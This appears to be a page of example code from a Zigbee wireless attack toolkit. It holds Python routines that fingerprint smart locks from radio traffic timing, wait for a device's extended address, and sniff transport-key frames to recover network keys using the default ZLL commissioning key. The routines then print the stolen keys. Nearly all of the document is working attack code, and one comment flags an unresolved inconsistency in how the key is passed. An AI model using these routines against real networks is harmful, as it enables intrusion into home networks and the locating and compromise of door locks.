Exemple #1
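def find_locks(radio, panid=None):
    """Return ``(pan, addr)`` pairs whose data-request timing resembles a lock.

    Frames are read from ``radio`` until ``Timer(17)`` expires, or until more
    than 5 seconds pass with no non-beacon-request traffic. For every data
    request (optionally restricted to ``panid``) a ``TrackWatch`` is clicked
    once per new sequence number, so repeated frames with the same sequence
    number are counted once. A device is reported when its watch's variance
    is below ``THRESHOLD_VARIANCE`` and its mean is above ``MIN_FREQUENCY``.

    Only header fields are read here (PAN ID, source address, sequence
    number); no key material is used, so this classification relies on
    traffic timing alone.

    Args:
        radio: object exposing ``receive()``, which may return ``None``.
        panid: PAN ID to restrict the search to, or ``None`` for any PAN.

    Returns:
        List of ``(pan, addr)`` tuples for the devices that matched.
    """
    result = []
    trackers = {}
    last_sequence_number = {}
    # NOTE(review): these messages say "lights" although the routine reports
    # locks; the text is kept unchanged in case the output is parsed.
    if panid is not None:
        print_notify("Looking at PAN ID 0x%04x for lights" % panid)
    else:
        print_notify("Looking for lights on the current channel")
    print_info("Monitoring the network for an extended period")
    timer = Timer(17)
    traffic_counter = 0
    while not timer.has_expired():
        frame = radio.receive()
        # receive() can yield None; only inspect real frames.
        if frame is not None:
            if not is_beacon_request(frame):
                traffic_counter += 1
            if is_data_request(frame):
                pan = get_pan_id(frame)
                if panid is None or pan == panid:
                    source = get_source(frame)
                    seqnum = frame[Dot15d4FCS].seqnum
                    watches = trackers.setdefault(pan, {})
                    seen = last_sequence_number.setdefault(pan, {})
                    if source not in watches:
                        watches[source] = TrackWatch()
                        seen[source] = -1
                    # Count a frame only when its sequence number differs
                    # from the last one seen for this device.
                    if seen[source] != seqnum:
                        watches[source].click()
                        seen[source] = seqnum

        if timer.time_passed() > 5 and traffic_counter == 0:
            print_info("No traffic observed for 5 seconds, giving up")
            break

    for pan, watches in trackers.items():
        for addr, watch in watches.items():
            variance = watch.variance()
            if variance is None:
                # The original formatted the variance with %f unconditionally,
                # which raises TypeError when variance() returns None.
                print_debug(
                    "Device 0x%04x on PAN 0x%04x had no variance available"
                    % (addr, pan))
                continue
            mean = watch.mean()
            if variance < THRESHOLD_VARIANCE and mean > MIN_FREQUENCY:
                result.append((pan, addr))
                print_notify("Device 0x%04x on PAN 0x%04x resembles a lock" %
                             (addr, pan))
            print_debug(
                "Device 0x%04x on PAN 0x%04x had variance of %f and mean of %f"
                % (addr, pan, variance, mean))

    return result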
Exemple #2
 def notify(self, channel, frame):
     """Inspect one received frame and report a network key if one decrypts.

     Nothing happens unless ``frame`` is a transport-key frame that carries
     an extended source address. ``channel`` is not used in this body.
     """
     if not is_transport_key(frame):
         return
     extended_source = get_extended_source(frame)
     if extended_source is None:
         return

     extended_source_bytes = extended_address_bytes(extended_source)
     # The decryption key is derived from a library constant, not from a
     # per-network secret, so a frame that validates here was protected only
     # by a default key.
     transport_key = crypto_utils.zigbee_trans_key(
         crypto_utils.DEFAULT_ZLL_COMMISSION_KEY)
     decrypted, valid = crypto_utils.zigbee_packet_decrypt(
         transport_key, frame, extended_source_bytes)
     if not valid:
         return

     print_notify("Network key acquired for PAN 0x%04x" % get_pan_id(frame))
     # Bytes 2..17 of the decrypted payload are taken as the 16-byte key;
     # presumably a 2-byte prefix precedes it - TODO confirm the layout.
     network_key = bytes(decrypted)[2:18]
     # NOTE(review): the key is written to the console in clear, so any
     # captured output or log of this run holds key material.
     print_info("Extracted key is 0x%s" % network_key.hex())
Exemple #3
def wait_for_extended_address(radio, panid, addr):
    """Wait for a frame from (panid, addr) that carries an extended source.

    Frames are read from ``radio`` until ``Timer(OBSERVATION_TIME)`` expires.

    Returns:
        The extended source of the first matching frame that has one, or
        ``None`` if the timer expires first (an error is printed).
    """
    print_info("Waiting to observe the extended source for pan_id:0x%04x, src_addr:0x%04x" % (panid, addr))

    deadline = Timer(OBSERVATION_TIME)
    while not deadline.has_expired():
        candidate = radio.receive()
        # Skip frames from any other PAN or short address.
        if panid != get_pan_id(candidate) or addr != get_source(candidate):
            continue
        extended_source = get_extended_source(candidate)
        if extended_source is None:
            # Matching device, but this frame has no extended address.
            continue
        print_notify("Extended source observed: 0x%016x" % extended_source)
        return extended_source

    print_error("Could not find extended source")
    return None
    def extractKeyOnChannel(self, channel):
        """Tune the radio to ``channel`` and watch for transport-key frames.

        Each transport-key frame that carries an extended source address is
        decrypted with ``crypto_utils.DEFAULT_ZLL_COMMISSION_KEY``; when the
        result validates, the 16 bytes at offset 2 are printed as the
        network key.

        NOTE(review): no return, break or timeout is visible in this
        listing, so as shown the loop never ends; the function may continue
        beyond the visible lines.
        """
        self.radio.set_channel(channel)

        # Report the channel the radio says it is on, not the requested one.
        print_notify("Listening to channel %d" % self.radio.get_channel())

        while True:
            frame = self.radio.receive()
            if is_transport_key(frame):
                print_notify("Got transport key packet")
                if get_extended_source(frame) is not None:
                    print("Got extended source")
                    extended_source_bytes = extended_address_bytes(
                        get_extended_source(frame))
                    # The key is a library constant rather than a per-network
                    # secret, so a frame that validates here was protected
                    # only by a default key.
                    # NOTE(review): the constant is passed as-is here, while
                    # the notify() listing on this page wraps it in
                    # crypto_utils.zigbee_trans_key(...) first - confirm
                    # which form zigbee_packet_decrypt expects.
                    decrypted, valid = crypto_utils.zigbee_packet_decrypt(
                        crypto_utils.DEFAULT_ZLL_COMMISSION_KEY, frame,
                        extended_source_bytes)
                    if valid:
                        print_notify("Network key acquired for PAN 0x%04x" %
                                     get_pan_id(frame))
                        # Bytes 2..17 are taken as the key; presumably a
                        # 2-byte prefix precedes it - TODO confirm layout.
                        network_key = bytes(decrypted)[2:18]
                        # NOTE(review): the key is printed in clear, so
                        # captured output of this run holds key material.
                        print_info("Extracted key is 0x%s" % network_key.hex())